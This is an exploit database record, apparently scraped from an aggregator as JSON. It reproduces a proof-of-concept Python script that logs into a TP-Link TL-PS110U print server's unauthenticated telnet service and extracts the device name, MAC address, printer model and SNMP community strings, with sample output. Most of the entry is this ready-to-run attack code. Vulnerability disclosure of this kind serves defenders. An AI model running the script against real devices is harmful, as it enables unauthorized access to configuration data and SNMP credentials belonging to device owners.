TP-Link PS110U Print Server TL - Sensitive Information Enumeration

2013-06-19T00:00:00

Description

{"lastseen": "2020-04-01T19:04:50", "references": [], "description": "\nTP-Link PS110U Print Server TL - Sensitive Information Enumeration", "edition": 1, "reporter": "SANTHO", "exploitpack": {"type": "remote", "platform": "hardware"}, "published": "2013-06-19T00:00:00", "title": "TP-Link PS110U Print Server TL - Sensitive Information Enumeration", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-06-19T00:00:00", "id": "EXPLOITPACK:63E07900FC8F34C5983571BFCEB1BE84", "href": "", "viewCount": 3, "sourceData": "# Exploit Title: TP-Link Print Server Sensitive Information Enumeration\n# Exploit Author: SANTHO\n# Vendor Homepage: http://www.tp-link.com\n# Software Link: http://www.tp-link.com/en/products/details/?model=TL-PS110U\n# Version: TL PS110U\nTP-Link TL PS110U Print Server runs telnet service which enables an\nattacker to access the configuration details without authentication. The\nPoC can extract device name, MAC address, manufacture name, Printer model,\nand SNMP Community Strings.\n\n*Sample Output*\n\nroot@bt# ./tplink-enum.py 10.0.0.2\n\nDevice Name : 1P_PrintServABCD\n\nNode ID : AA-AA-AA-AA-AA-AA\n\nManufacture: Hewlett-Packard\n\nModel: HP LaserJet M1005\n\nCommunity 1: public Read-Only\n\nCommunity 2: public Read-Only\n\nimport telnetlib\nimport sys\nhost = sys.argv[1]\ntn = telnetlib.Telnet(host)\ntn.read_until(\"Password:\")\ntn.write(\"\\r\\n\")\ntn.read_until(\"choice\")\ntn.write(\"1\\r\\n\")\ntn.read_until(\"choice\")\ntn.write(\"1\\r\\n\")\ndata = tn.read_until(\"choice\")\nfor i in data.split(\"\\r\\n\"):\n\tif \"Device Name\" in i:\n\t\tprint i.strip()\n\tif \"Node ID\" in i:\n\t\tprint i.strip()\ntn.write(\"0\\r\\n\")\ntn.read_until(\"choice\")\ntn.write(\"2\\r\\n\")\ndata = tn.read_until(\"choice\")\nfor i in data.split(\"\\r\\n\"):\n\tif \"Manufacture:\" in i:\n\t\tprint i.strip()\n\tif \"Model:\" in i:\n\t\tprint i.strip()\ntn.write(\"0\\r\\n\")\ntn.read_until(\"choice\")\ntn.write(\"5\\r\\n\")\ndata = tn.read_until(\"choice\")\nfor i in data.split(\"\\r\\n\"):\n\tif \"Community\" in i:\n\t\tprint i.strip()", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645580244}}